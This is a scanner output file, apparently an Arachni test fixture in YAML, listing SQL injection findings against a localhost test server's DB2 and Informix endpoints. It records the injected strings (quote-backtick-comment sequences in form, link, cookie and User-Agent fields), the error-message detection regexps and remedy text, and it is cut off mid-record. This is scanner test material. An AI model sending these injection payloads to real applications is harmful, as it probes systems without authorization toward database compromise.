:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/db2/form/flip
:verification:
:id: ! 'DB2 SQL error:'
var: Parameter flip
url: http://localhost:7362/db2/form/flip
injected: ''
id: ! 'DB2 SQL error:'
regexp: (?i-mx:DB2 SQL error:)
regexp_match: ! 'DB2 SQL error:'
elem: form
remarks: {}
method: GET
response: ! '["DB2 SQL error:\n[IBM][CLI Driver][DB2/6000]\nCLI Driver stuff DB2\nDB2
SQL error\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/db2/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:DB2 SQL error:)
:match: ! 'DB2 SQL error:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/db2/form/append
:verification:
:id: ! 'DB2 SQL error:'
var: input
url: http://localhost:7362/db2/form/append
injected: default'`--
id: ! 'DB2 SQL error:'
regexp: (?i-mx:DB2 SQL error:)
regexp_match: ! 'DB2 SQL error:'
elem: form
remarks: {}
method: GET
response: ! 'DB2 SQL error:
[IBM][CLI Driver][DB2/6000]
CLI Driver stuff DB2
DB2 SQL error
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nzg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/db2/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:DB2 SQL error:)
:match: ! 'DB2 SQL error:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/db2/link/append?input=default
:verification:
:id: ! 'DB2 SQL error:'
var: input
url: http://localhost:7362/db2/link/append?input=default
injected: default'`--
id: ! 'DB2 SQL error:'
regexp: (?i-mx:DB2 SQL error:)
regexp_match: ! 'DB2 SQL error:'
elem: link
remarks: {}
method: GET
response: ! 'DB2 SQL error:
[IBM][CLI Driver][DB2/6000]
CLI Driver stuff DB2
DB2 SQL error
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nzg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/db2/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:DB2 SQL error:)
:match: ! 'DB2 SQL error:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/db2/link/flip?input=default
:verification:
:id: ! 'DB2 SQL error:'
var: Parameter flip
url: http://localhost:7362/db2/link/flip?input=default
injected: ''
id: ! 'DB2 SQL error:'
regexp: (?i-mx:DB2 SQL error:)
regexp_match: ! 'DB2 SQL error:'
elem: link
remarks: {}
method: GET
response: ! '["DB2 SQL error:\n[IBM][CLI Driver][DB2/6000]\nCLI Driver stuff DB2\nDB2
SQL error\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/db2/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:DB2 SQL error:)
:match: ! 'DB2 SQL error:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value)
:injected: cookie value)
:combo:
!binary "Y29va2llMg==": cookie value)
:action: http://localhost:7362/db2/cookie/append
:verification:
:id: ! 'DB2 SQL error:'
var: cookie2
url: http://localhost:7362/db2/cookie/append
injected: cookie value)
id: ! 'DB2 SQL error:'
regexp: (?i-mx:DB2 SQL error:)
regexp_match: ! 'DB2 SQL error:'
elem: cookie
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! 'DB2 SQL error:
[IBM][CLI Driver][DB2/6000]
CLI Driver stuff DB2
DB2 SQL error
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value)
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nzg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/db2/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:DB2 SQL error:)
:match: ! 'DB2 SQL error:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/db2/cookie/flip
:verification:
:id: ! 'DB2 SQL error:'
var: Parameter flip
url: http://localhost:7362/db2/cookie/flip
injected: ''
id: ! 'DB2 SQL error:'
regexp: (?i-mx:DB2 SQL error:)
regexp_match: ! 'DB2 SQL error:'
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "DB2 SQL error:\n[IBM][CLI Driver][DB2/6000]\nCLI Driver stuff
DB2\nDB2 SQL error\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/db2/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:DB2 SQL error:)
:match: ! 'DB2 SQL error:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/db2/header/append
:verification:
:id: ! 'DB2 SQL error:'
var: User-Agent
url: http://localhost:7362/db2/header/append
injected: arachni_user'`--
id: ! 'DB2 SQL error:'
regexp: (?i-mx:DB2 SQL error:)
regexp_match: ! 'DB2 SQL error:'
elem: header
remarks: {}
method: GET
response: ! 'DB2 SQL error:
[IBM][CLI Driver][DB2/6000]
CLI Driver stuff DB2
DB2 SQL error
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nzg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTozMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/db2/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:DB2 SQL error:)
:match: ! 'DB2 SQL error:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/db2/header/flip
:verification:
:id: ! 'DB2 SQL error:'
var: Parameter flip
url: http://localhost:7362/db2/header/flip
injected: ''
id: ! 'DB2 SQL error:'
regexp: (?i-mx:DB2 SQL error:)
regexp_match: ! 'DB2 SQL error:'
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "DB2 SQL error:\n[IBM][CLI Driver][DB2/6000]\nCLI Driver stuff
DB2\nDB2 SQL error\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjM2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTozOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/informix/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:com\.informix\.jdbc)
:match: com.informix.jdbc
:substring:
:ignore:
- !binary |-
